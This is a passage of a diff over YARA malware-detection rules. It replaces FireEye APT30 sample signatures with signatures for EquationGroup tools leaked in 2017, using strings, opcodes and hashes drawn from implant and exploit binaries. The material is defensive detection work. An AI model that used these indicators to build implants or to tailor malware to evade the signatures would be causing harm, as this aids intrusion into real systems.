-		$s3 = "reateProcesy" ascii
-		$s5 = "FreeLibr1y*S" ascii
-		$s6 = "foAModuleHand" ascii
+		$x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide
+		$x2 = "* Capture header not found at start of buffer" fullword wide
+		$x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_5 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Oracle_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bdbebe44-7423-5793-8a42-4f9b70de2231"
-		date = "2015-04-13"
+		id = "6ff4cd21-1060-5901-842e-c04bde4f16ec"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L110-L127"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2364-L2379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1a2dd2a0555dc746333e7c956c58f7c4cdbabd4b"
-		logic_hash = "3738076d97bf19404bad20c2419eae83dd2b65400d5bd135ffe73362c008de9b"
+		logic_hash = "568a5d103527e6fd99bbac8d49a2d667f464fd16d5bf276f98c88c39e129b58b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e"
 
 	strings:
-		$s0 = "Version 4.7.3001" fullword wide
-		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
-		$s3 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
-		$s7 = "msmsgs" fullword wide
-		$s10 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+		$op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 }
+		$op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 }
+		$op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_6 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f19809c-09fc-51bf-9a20-6b95099a92dd"
-		date = "2015-04-13"
+		id = "182a2488-ac3f-5dc6-aa61-d6d267574d10"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L129-L143"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2381-L2395"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "00e69b059ad6b51b76bc476a115325449d10b4c0"
-		logic_hash = "139719139056f575967629f0153e0a05239bc26f61f6d4324cfb6a816518c3df"
+		logic_hash = "9ae3e0c30c9dbee311d4e5576b1a447ac57f8b1786dc5753246ad3c08ccecb85"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2"
 
 	strings:
-		$s0 = "GreateProcessA" fullword ascii
-		$s1 = "Ternel32.dll" fullword ascii
+		$s1 = "\\\\.\\%ls" fullword ascii
+		$s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_7 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setresourcename : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "612732d9-8df5-5388-b299-2da4f8118435"
-		date = "2015-04-13"
+		id = "dc261147-3b52-57c3-9729-2645a0999a99"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L145-L163"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2397-L2413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "868d1f4c106a08bd2e5af4f23139f0e0cd798fba"
-		logic_hash = "f7922d795bc92714a9ef4861bc9c4ac9921a73749e3aa1d5f7dbc3c991fe7145"
+		logic_hash = "e26aac30e06da14060a955761d08e6f543db2f2747be2959b0090f60e6eb52a5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e"
 
 	strings:
-		$s0 = "datain" fullword ascii
-		$s3 = "C:\\Prog" ascii
-		$s4 = "$LDDATA$" ascii
-		$s5 = "Maybe a Encrypted Flash" fullword ascii
-		$s6 = "Jean-loup Gailly" ascii
-		$s8 = "deflate 1.1.3 Copyright" ascii
+		$x1 = "Updates the name of the dll or executable in the resource file" fullword ascii
+		$x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii
+		$x3 = "2 = [appinit.dll] level4 dll" fullword ascii
+		$x4 = "1 = [spcss32.exe] level3 exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_E : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Drivers_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69e76a59-3529-541d-9017-07e6d67fbda4"
-		date = "2015-04-13"
+		id = "727a0a8c-0019-53e9-9632-c610299305fc"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L165-L183"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2415-L2431"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5ccf1f1334dc300d13aa8dbc080d2d839815d102958fde2b8709c11f522412fd"
+		logic_hash = "45190a317f3d293dbc3015873080d1253bfb3298008f5dea69ab1a5780a70721"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1dbb584e19499e26398fb0a7aa2a01b7"
-		hash2 = "572c9cd4388699347c0b2edb7c6f5e25"
-		hash3 = "8ff473bedbcc77df2c49a91167b1abeb"
-		hash4 = "a813eba27b2166620bd75029cc1f04b0"
-		hash5 = "b5546842e08950bc17a438d785b5a019"
+		hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab"
 
 	strings:
-		$s0 = "Nkfvtyvn}" ascii
-		$s6 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s2 = "hZwLoadDriver" fullword ascii
+		$op1 = { b0 01 e8 58 04 00 00 c3 33 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_8 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Shares_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5053c2db-32a9-58ae-9a72-eb16ef14168e"
-		date = "2015-04-13"
+		id = "51245be4-6d24-57e4-8c92-c8c1ae5e3cf9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L185-L201"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2433-L2449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9531e21652143b8b129ab8c023dc05fef2a17cc3"
-		logic_hash = "bff21d517e97d2b13dff2b5ebc9a5b82b8f7635943c89f992b41d269623cd498"
+		logic_hash = "11a1af97d720286a7fadf8b056f8f7add70acb041a828441166f5c74bc7a819d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb"
 
 	strings:
-		$s0 = "ateProcessA" ascii
-		$s1 = "Ternel32.dllFQ" fullword ascii
-		$s2 = "StartupInfoAModuleHand" fullword ascii
-		$s3 = "OpenMutex" fullword ascii
+		$s1 = "Select * from Win32_Share" fullword ascii
+		$s2 = "slocalhost" fullword wide
+		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
+		$s4 = "\\\\%ls\\%ls" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_B : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntfltmgr : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "df3b8896-7229-5b3b-ad2f-774b0cea167c"
-		date = "2015-04-13"
+		id = "402b14f5-4a7a-58fb-8f4a-0a29d6d34440"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L203-L222"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2451-L2475"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "527c823607836f138369224b7d8d492d36d9ab7a150e64fd5ebbaf99538d6d53"
+		logic_hash = "9f280baf785f54218cbf47f65419cfe23c687e58021f36b5d116904d2cec9a9b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0fcb4ffe2eb391421ec876286c9ddb6c"
-		hash2 = "29395c528693b69233c1c12bef8a64b3"
-		hash3 = "4c6b21e98ca03e0ef0910e07cef45dac"
-		hash4 = "550459b31d8dabaad1923565b7e50242"
-		hash5 = "65232a8d555d7c4f7bc0d7c5da08c593"
-		hash6 = "853a20f5fc6d16202828df132c41a061"
-		hash7 = "ed151602dea80f39173c2f7b1dd58e06"
+		hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124"
+		hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
+		hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43"
 
 	strings:
-		$s2 = "Moziea/4.0" ascii
+		$s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii
+		$s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii
+		$op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 }
+		$op2 = { ff 15 0b 34 00 00 eb 92 }
+		$op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae }
+		$op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 }
+		$op5 = { 8a 40 01 00 c7 47 70 }
+		$op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 }
+		$op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_I : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55046e1a-731a-5418-9a7a-4fe1611c77d0"
-		date = "2015-04-13"
+		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L224-L240"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2477-L2492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e6f0edcbf6e0590c8b4a558142053d5938e86d13d65787f02336dc2a173d5963"
+		logic_hash = "273e38e287b1597753f653c0ed8300936581a1b767029d3f0ba757de589bcd5a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe211c7a081c1dac46e3935f7c614549"
-		hash2 = "8c9db773d387bf9b3f2b6a532e4c937c"
+		hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f"
 
 	strings:
-		$s0 = "Copyright 2012 Google Inc. All rights reserved." fullword wide
-		$s1 = "(Prxy%c-%s:%u)" fullword ascii
-		$s2 = "Google Inc." fullword wide
+		$op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 }
+		$op1 = { 45 33 c9 49 8d 7f 2c 41 ba }
+		$op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_9 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_LP : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf24bb57-aff9-579c-b8a2-265a6d2a06d0"
-		date = "2015-04-13"
+		id = "c3f8f0f9-80ab-5d8e-be42-59b90dc291cb"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L242-L263"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2494-L2508"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "442bf8690401a2087a340ce4a48151c39101652f"
-		logic_hash = "0c5465bdafcbca02f855a0cba1fbb4c19d8d21b714dbe777b942dcd1a7acb257"
+		logic_hash = "cd7b92f13e0a00d23baef70e38b476b62394106dfa70e831786f398c573aa744"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296"
 
 	strings:
-		$s0 = "\\Windo" ascii
-		$s2 = "oHHOSTR" ascii
-		$s3 = "Softwa]\\Mic" ascii
-		$s4 = "Startup'T" ascii
-		$s6 = "Ora\\%^" ascii
-		$s7 = "\\Ohttp=r" ascii
-		$s17 = "help32Snapshot0L" ascii
-		$s18 = "TimUmoveH" ascii
-		$s20 = "WideChc[lobalAl" ascii
+		$s1 = "* Failed to get connection information.  Aborting launcher!" fullword wide
+		$s2 = "Format: <command> <target port> [lp port]" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_10 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remotecommand_Lp : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "98ace4d7-edd0-5e84-bac8-b69e5307f567"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L264-L283"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2510-L2524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eb518cda3c4f4e6938aaaee07f1f7db8ee91c901"
-		logic_hash = "5a6bd8223fbce133bd11b903edfd7f8ff5a436e26a47c048a5ac606ad4a0b564"
+		logic_hash = "974772264324e7721f51a88534aaa3b4eb1d409e04f673783caf4849d90522de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846"
 
 	strings:
-		$s0 = "Version 4.7.3001" fullword wide
-		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
-		$s2 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
-		$s3 = "!! Use Connect Method !!" fullword ascii
-		$s4 = "(Prxy%c-%s:%u)" fullword ascii
-		$s5 = "msmsgs" fullword wide
-		$s18 = "(Prxy-No)" fullword ascii
+		$s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide
+		$s2 = "Unable to get TCP listen port: %08x" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_11 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Lp_Mstcp : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "afa4985e-7c8f-58fc-9881-219ccba6a495"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L285-L312"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2526-L2545"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "59066d5d1ee3ad918111ed6fcaf8513537ff49a6"
-		logic_hash = "5e86b53591caa7c783a946205a3d04f91c71294d844e6f6ee88c3bc78e603ea0"
+		logic_hash = "5d1423661f95d955f411414138da45cc4be59b2e6bf8e70f471b8f41fc9ea3f4"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd"
 
 	strings:
-		$s0 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
-		$s1 = "msofscan.exe" fullword wide
-		$s2 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
-		$s3 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
-		$s4 = "Windows XP Professional x64 Edition or Windows Server 2003" fullword ascii
-		$s9 = "NetEagle_Scout - " fullword ascii
-		$s10 = "Server 4.0, Enterprise Edition" fullword ascii
-		$s11 = "Windows 3.1(Win32s)" fullword ascii
-		$s12 = "%s%s%s %s" fullword ascii
-		$s13 = "Server 4.0" fullword ascii
-		$s15 = "Windows Millennium Edition" fullword ascii
-		$s16 = "msofscan" fullword wide
-		$s17 = "Eagle-Norton360-OfficeScan" fullword ascii
-		$s18 = "Workstation 4.0" fullword ascii
-		$s19 = "2003 Microsoft Office system" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s2 = "_PacketNDISRequestComplete@12\"" fullword ascii
+		$s3 = "_LDNdis5RegDeleteKeys@4" ascii
+		$op1 = { 89 7e 04 75 06 66 21 46 02 eb }
+		$op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 }
+		$op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e }
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $s* ) or all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_APT30_Sample_12 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Renamer : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "b5a7c8a8-c30d-5667-a458-6962a24061d3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L314-L329"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2547-L2561"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b02b5720ff0f73f01eb2ba029a58b645c987c4bc"
-		logic_hash = "997c91267f956bd7d2a7edca9817ebc80bbf1eed944b3bc01cc8bb01927deb1e"
+		logic_hash = "4941f31be6674499b202a3071d795317e6d97fb19088ea370180708e3d04bca7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac"
 
 	strings:
-		$s0 = "Richic" fullword ascii
-		$s1 = "Accept: image/gif, */*" fullword ascii
-		$s2 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+		$s1 = "FILE_NAME_CONVERSION.LOG" fullword wide
+		$s2 = "Log file exists. You must delete it!!!" fullword wide
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_13 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Exploit : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "67a4c8b8-87fb-5f2d-a4dd-299d087c77a3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L331-L349"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2563-L2579"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a359f705a833c4a4254443b87645fd579aa94bcf"
-		logic_hash = "cd5285e8b78493b64704cec21c13d0a017d66936aa8356cfea2aa77c6f87b9e7"
+		logic_hash = "6f04ec5d1066b34ebee2504f7d229610e525743f7536d58bf99fc4f89ac6aa3b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0"
 
 	strings:
-		$s0 = "msofscan.exe" fullword wide
-		$s1 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
-		$s2 = "Microsoft Office Word Plugin Scan" fullword wide
-		$s3 = "? 2006 Microsoft Corporation.  All rights reserved." fullword wide
-		$s4 = "msofscan" fullword wide
-		$s6 = "2003 Microsoft Office system" fullword wide
+		$s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide
+		$s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide
+		$s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide
+		$s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_14 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Gen : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
